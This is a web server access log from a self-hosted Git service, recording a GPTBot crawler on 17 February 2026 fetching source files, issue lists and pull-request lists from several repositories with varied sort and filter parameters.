"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:19:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:19:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:19:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:19:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:19:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:19:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:19:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13583] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:19:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11827] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:19:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:19:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:19:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 11140] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:19:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 